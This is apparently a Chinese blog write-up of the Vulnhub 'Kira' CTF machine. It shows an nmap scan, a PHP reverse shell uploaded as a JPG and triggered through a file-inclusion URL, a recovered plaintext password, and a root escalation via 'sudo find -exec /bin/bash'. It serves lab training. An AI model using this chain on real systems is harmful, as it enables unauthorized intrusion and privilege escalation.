首页 > 其他分享 >Vulnhub:Kira: CTF靶机

Vulnhub:Kira: CTF靶机

时间:2023-09-09 19:55:57浏览次数:42  
标签:111.238 php sudo bassam 192.168 CTF Vulnhub 靶机 Kira

kali:192.168.111.111

靶机:192.168.111.238

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.238

image

访问80端口

image

点击upload发现是个上传点

image

点击language发现存在文件包含

image

image

上传php图片马再利用文件包含反弹shell

image

http://192.168.111.238/language.php?lang=/uploads/php-reverse-shell.jpg

image

image

提权

/var/www/html/supersecret-for-aziz/bassam-pass.txt文件中发现bassam用户的密码:Password123!@#

image

image

bassam用户sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/find/#sudo

image

提升为root

sudo -u root find . -exec /bin/bash \;

image

标签:111.238,php,sudo,bassam,192.168,CTF,Vulnhub,靶机,Kira
From: https://www.cnblogs.com/ctostm/p/17690065.html

相关文章

  • SY2023CTF--“安洵杯”全国精英赛MISC--烦人的压缩包
    前言:由于最近要比第二届技能大赛CTF就玩的少(我很菜,求大佬带)随便看看做了一题那个数独也简单不敢兴趣就run了烦人的压缩包:首先下载下来一个压缩包需要密码直接爆破一下使用工具:Ziperello得到密码:645321解压打开得到两个文件hint.txt和love.jpg放入010Editor发现是有......
  • googlectf2023 gradebook 复现(TOCTOU)
    Gradebook结构根据函数sub_2247开头的部分可以推测出gradebook的结构0x4year0x8gradebookname(32bytes)0x28studentname(32bytes)0x48sizeofthisgradebook(uint)0x50firstgradestructureoffset0x58newgradestructureoffset每一条记录grade......
  • CTF BugKu平台—Misc:多种方法解决
    题目链接:https://ctf.bugku.com/challenges/detail/id/12.html下载下来是个exe运行然后不行放入winhex中发现了base64还有jpg会不会是base转图片还真是把后缀改为txt全部复制放入网站还原base64图片转换:http://tool.chinaz.com/tools/imgtobase/把图片下载下来使......
  • [RoarCTF 2019]Easy Java
    [RoarCTF2019]EasyJava打开题目发现如下界面根据题目的提示,这道题不太可能考sql注入,应该是与java有关,因此点击help查看信息这里提示java.io.FileNotFoundException:{help.docx},而url路径中的参数正是filename=help.docx这里需要了解一个知识点:WEB-INFWEB-INF是java的WEB......
  • BUUCTF [GYCTF2020]FlaskApp
    因为题目名Flask,所以先观察功能点,寻找易发生ssti的功能。考虑到功能异常抛出常见于解密环节,所以在解密界面随便输入一段不能解密的。直接报错抛出debug信息,看来是开启了debug模式。payload的使用需要输入到加密界面,再将加密结果输入到解密界面查看结果。方法1首先想办法把完......
  • 0ctf babyheap
    文件信息pwndbg>checksec[*]'/mnt/hgfs/CTF/nightmare-master/modules/28-fastbin_attack/0ctf_babyheap/0ctfbabyheap'Arch:amd64-64-littleRELRO:FullRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled保护全开pwndbg>r......
  • 菜刀流量分析 CTF
    下载文件,是pcapng流量包,打开总共也就33个包,可以http筛选,关键流量包在最后这里默认是这样的调整一下就出来了连flag值都没变~~前面的几个包也可以看下中间部分是base64编码,大致是读目录列表操作,后面有返回目录列表,看结构应该是windows的后面还有个http请求返回包这......
  • BUUCTF-Web
    CTF实战:从入门到提升1.3.5.[第一章][1.3.5案例解析][极客大挑战2019]Http 打开页面,没有发现什么有用的东西右键打开页面源代码,发现页面Secret.php 显示Itdoesn'tcomefrom'https://Sycsecret.buuoj.cn',使用postman,增加Referer头显示Please use "Syclo......
  • BUUCTF [De1CTF 2019]SSRF Me
    源码#!/usr/bin/envpython#encoding=utf-8fromflaskimportFlaskfromflaskimportrequestimportsocketimporthashlibimporturllibimportsysimportosimportjsonreload(sys)sys.setdefaultencoding('latin1')app=Flask(__name__......
  • BUUCTF [极客大挑战 2019]FinalSQL
    通过尝试发现注入点在search.php。传递?id=1^1报ERROR!!!;传递?id=1^0报NO!Notthis!Clickothers~~~布尔盲注importrequestsimporttimeurl="http://eab3a4cf-d57d-4236-a9f9-1383446ba4e1.node4.buuoj.cn:81/search.php?"result=''temp={"id":......